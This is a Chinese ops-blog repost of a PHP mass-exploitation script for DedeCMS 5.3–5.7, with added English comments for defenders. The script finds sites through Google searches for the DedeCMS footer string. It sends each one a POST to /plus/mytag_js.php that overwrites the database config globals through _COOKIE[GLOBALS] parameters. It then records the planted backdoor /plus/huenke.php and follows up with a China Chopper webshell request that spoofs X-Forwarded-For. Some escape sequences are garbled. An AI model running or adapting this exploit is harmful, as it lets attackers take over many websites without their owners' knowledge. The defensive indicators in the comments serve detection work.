
dedecms5.3-5.7批量getwebshell代码

CMS相关 REKFAN.COM 16778浏览 0评论



<?php
// Archived listing of a mass-exploitation script aimed at DedeCMS 5.3-5.7 (per the page title).
// Reading notes for defenders:
//   * Driver loop: pages through search results for the fingerprint in $keyword, and for every
//     host not yet recorded in c:/url.txt calls Getshell() and then rname().
//   * Indicators visible in this listing: POSTs to /plus/mytag_js.php?aid=1 whose body carries
//     parameters named _COOKIE[GLOBALS][cfg_db...], and a file at /plus/huenke.php.
//   * NOTE(review): the listing is damaged as archived; treat it as a record of the technique,
//     not as runnable code.
print_r('
[-]Exploit Title: DEDEcms Variable coverage
[-]Date: 1182011
[-]Getshell Author: cfking#90sec.org
[-]Site from google
'
);
error_reporting(E_ERROR);
set_time_limit(0);
// Footer string that default DedeCMS installs expose; it is what makes them discoverable in bulk.
// Removing it lowers exposure to this kind of harvesting but does not fix the underlying flaw.
$keyword='Powered by dedecms' ;// search keyword
$timeout = 30;
$stratpage = 5;
$lastpage = 10000000; //
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
// One page of candidate hosts per iteration.
$array=ReadgoogleList($keyword,$timeout,$i);
foreach ($array as $url ){
// c:/url.txt is the log of hosts already attempted; it is re-read for every candidate.
$url_list=file('c:/url.txt');
if (in_array("$urlrn",$url_list)){
echo "[*] Links repeatn";
}else{
// Record the host before the attempt so it is not tried twice.
$fp = @fopen('c:/url.txt', 'a');
@fwrite($fp, $url."rn");
@fclose($fp);
print_r("
[-] Geting URL: $urlrn");
$exploit=Getshell($url);
// Getshell() returns only the first line of the response, so "success" here means nothing
// more than "OK" appearing past offset 2 of that line.
if (strpos($exploit,"OK")>2){
// /plus/huenke.php is the path the script reports for a host it considers compromised;
// presumably the file planted by the attack. Its presence under /plus/ is worth hunting for.
echo "[*] ".$url."/plus/huenke.phprn";
$name=rname($url);
// Same first-line heuristic: "200" past offset 5.
if(strpos($name,"200")>5){
echo "[*] Rename Successn";
echo "[*] Record Successn";
// c:/shell.txt accumulates the reported backdoor URLs.
$fp = @fopen('c:/shell.txt', 'a');
@fwrite($fp, $url."/plus/huenke.phprn");
@fclose($fp); }
}
}
}
}
/**
 * Exploitation request (original header: "exploit the vulnerability").
 *
 * Builds a single raw HTTP POST to /plus/mytag_js.php?aid=1 on port 80 of $url and returns
 * the first line read back from the socket (the return statement sits inside the read loop).
 *
 * The form body sets parameters named _COOKIE[GLOBALS][cfg_dbhost], [cfg_dbuser], [cfg_dbpwd],
 * [cfg_dbname] and [cfg_dbprefix]: it tries to overwrite the CMS's database configuration
 * globals through request variables, which is the "variable coverage" named in the banner.
 * The values in the listing are unfilled placeholders (IP address, DB user, DB password, DB name).
 *
 * Defender notes:
 *   - No legitimate client sends parameter names beginning with _COOKIE[ or containing GLOBALS;
 *     matching them (URL-encoded as %5B / %5D) in request logs or a WAF rule is a low-noise signal.
 *   - Presumably a successful attempt makes the web server talk to an external database host;
 *     unexpected outbound database connections are a second place to look.
 *   - Mitigation is to run a vendor-patched release and to keep request input from ever being
 *     registered as global configuration variables.
 *
 * @param string $url Host name of the target (used both as socket host and Host header).
 * @return string|null First response line, or nothing if the loop body never runs.
 */
function Getshell($url){// original note: the $content below has to be edited by the operator
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=IP地址&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=数据库用户名&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=数据库密码&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=数据库名称&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";// original note: capture a request yourself and adapt it
// Request line and headers; the fixed User-Agent and Accept-* values below are static across
// every target and can serve as a secondary log fingerprint.
$data = "POST /plus/mytag_js.php?aid=1 HTTP/1.1rn";
$data .= "Host: ".$host."rn";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Accept-Language: zh-cn,zh;q=0.5rn";
//$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn";
$data .= "Connection: keep-alivern";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($content)."rnrn";
$data .= $content."rn";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from $host n";
}
fwrite($ock,$data);
while (!feof($ock)) {
// Only the first line is ever read: the function returns on the first iteration.
$exp=fgets($ock, 1024);
return $exp;
}
}
/**
 * Return the list of hosts found on one search-results page
 * (original header: "return the URL list of this page").
 *
 * Opens a plain socket to www.google.com.hk on port 80, requests /search with the URL-encoded
 * keyword and a start offset of ($nowpage-1)*10, reads the whole response, and collects the
 * text that follows each <cite> tag. Each match is cut at its first '/' and stripped of a
 * leading 'http://' so that only a host name remains.
 *
 * Defender note: target selection is purely fingerprint-driven, so any site that exposes the
 * searched footer string is a candidate regardless of who runs it.
 *
 * @param string $keyword  Search phrase used as the fingerprint.
 * @param int    $timeout  Socket connect timeout in seconds.
 * @param int    $nowpage  1-based results page number.
 * @return array Host names extracted from the page (empty if nothing matched).
 */
function ReadgoogleList($keyword,$timeout,$nowpage)
{
$tmp = array();
$data = '';
// Convert the page number into the result offset sent as the start parameter.
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.google.com.hk',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /search?q=".urlencode($keyword)."&start=".$nowpage." HTTP/1.1rnHost:www.google.com.hkrnConnection: Closernrn");
// Read until EOF; the loop is skipped entirely when the connection failed ($fp is false).
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
// Capture group 1 holds the text displayed after each <cite> tag.
preg_match_all("/<cite>(.*?)//",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i < $num;$i++)
{
// Keep only the part before the first '/', i.e. the host portion of the cited URL.
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}
/**
 * Post-compromise follow-up (original header: "rename the vulnerable file so it cannot be
 * exploited again").
 *
 * Sends one raw HTTP POST on port 80 of $url to a path under /plus/ that the listing leaves as
 * a placeholder ("your backdoor address"), with a body that is empty in the listing and meant
 * to be filled with a captured webshell-client request. Returns the first line of the response.
 * What the request actually does depends on that missing body; the header comment says it
 * renames the vulnerable file.
 *
 * Defender notes:
 *   - A missing or renamed /plus/mytag_js.php on an unpatched install is therefore itself a
 *     sign of prior compromise, not evidence that the site is safe.
 *   - The request carries a hard-coded X-Forwarded-For value, so logs that trust that header
 *     will record a false client address; correlate on the socket peer address instead.
 *
 * @param string $url Host name of the target.
 * @return string|null First response line, or nothing if the loop body never runs.
 */
function rname($url){// original note: fill in according to the instructions
$host=$url;
$port="80";
$content ='';// left empty in the listing; original note: adapt a captured "Chopper" client packet (presumably the China Chopper webshell client)
$data = "POST /plus/你后门地址 HTTP/1.1rn";
// Spoofed client address header, identical for every target.
$data .= "X-Forwarded-For: 199.1.88.29rn";
$data .= "Referer: http://$hostrn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0rn";
$data .= "Host: $hostrn";
$data .= "Content-Length: ".strlen($content)."rn";
$data .= "Cache-Control: no-cachernrn";
$data .= $content."rn";
$ock=fsockopen($host,$port); if (!$ock) {
echo "[*] No response from $host rn";
}
fwrite($ock,$data);
while (!feof($ock)) {
// As in Getshell(), only the first response line is read before returning.
$exp=fgets($ock, 1024);
return $exp;
}
} ?>

转载请注明:|REKFAN|系统运维| » dedecms5.3-5.7批量getwebshell代码
